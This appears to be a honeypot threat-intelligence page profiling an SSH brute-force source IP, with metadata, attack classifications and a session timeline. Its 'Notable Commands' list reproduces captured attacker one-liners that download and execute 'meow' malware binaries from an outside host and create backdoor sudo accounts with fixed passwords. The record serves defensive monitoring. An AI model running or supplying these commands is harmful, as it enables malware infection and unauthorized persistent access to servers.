← Back to feed

35.185.82.208

Threat Confidence
58%
Location
🇺🇸 US / North Charleston
ASN
AS396982 · Google LLC
Cloud Provider
Total Events
192
Above average by volume
Agent Count
1
First / Last Seen
2026-06-01 01:11 — 2026-06-01 01:13
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Execution
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Blocklist.de
Reported 2026-06-01 02:02
blocklist_de:reported
Session Forensics
scanner ×6 malware_dropper ×1 credential_probe ×3 interactive_operator ×3
Sessions
13 (4 with login)
Avg Depth Score
0.4
Commands Executed
117
Files Downloaded
4
Notable Commands
  • echo 'toor' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew)
  • whoami
  • cd /tmp
  • ulimit -n 1020000
  • rm -rf meow*
  • wget http://35.237.91.38/meow
  • curl -O http://35.237.91.38/meow
  • chmod 777 meow
  • ./meow
  • echo 'admin123' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):admin123 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):admin123 > /tmp/mew)
  • echo 'server' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew)
  • echo 'webmaster' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):webmaster > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):webmaster > /tmp/mew)
Download URLs
  • http://35.237.91.38/meowarm64
  • http://35.237.91.38/meow
Fingerprints
SSH-2.0-Go
Evidence Timeline
Scanner 84812d7436df w4m_singapore_01 · 2026-06-01 01:11
15%
Loading events...
Credential Probe 97df78c327d4 w4m_singapore_01 · 2026-06-01 01:11
1 20%
Loading events...
Scanner 6d1cdcef9b99 w4m_singapore_01 · 2026-06-01 01:11
15%
Loading events...
Scanner 3d544571fad1 w4m_singapore_01 · 2026-06-01 01:11
15%
Loading events...
Scanner ecc059deb2c0 w4m_singapore_01 · 2026-06-01 01:11
15%
Loading events...
Credential Probe d9d3648370df w4m_singapore_01 · 2026-06-01 01:11
1 20%
Loading events...
Interactive Operator 08cfed3029f0 w4m_singapore_01 · 2026-06-01 01:11
30 1 90%
Loading events...
Interactive Operator 130bf3e35eba w4m_singapore_01 · 2026-06-01 01:11
30 1 90%
Loading events...
Malware Dropper c3bbbe1a6704 w4m_singapore_01 · 2026-06-01 01:11
30 4 1 100%
Loading events...
Interactive Operator a5d165a0bea1 w4m_singapore_01 · 2026-06-01 01:11
27 1 90%
Loading events...
Scanner 595a7fd5d3b8 w4m_singapore_01 · 2026-06-01 01:11
15%
Loading events...
Credential Probe 85f7f007a706 w4m_singapore_01 · 2026-06-01 01:11
1 20%
Loading events...
Scanner 197b0cb651c8 w4m_singapore_01 · 2026-06-01 01:11
15%
Loading events...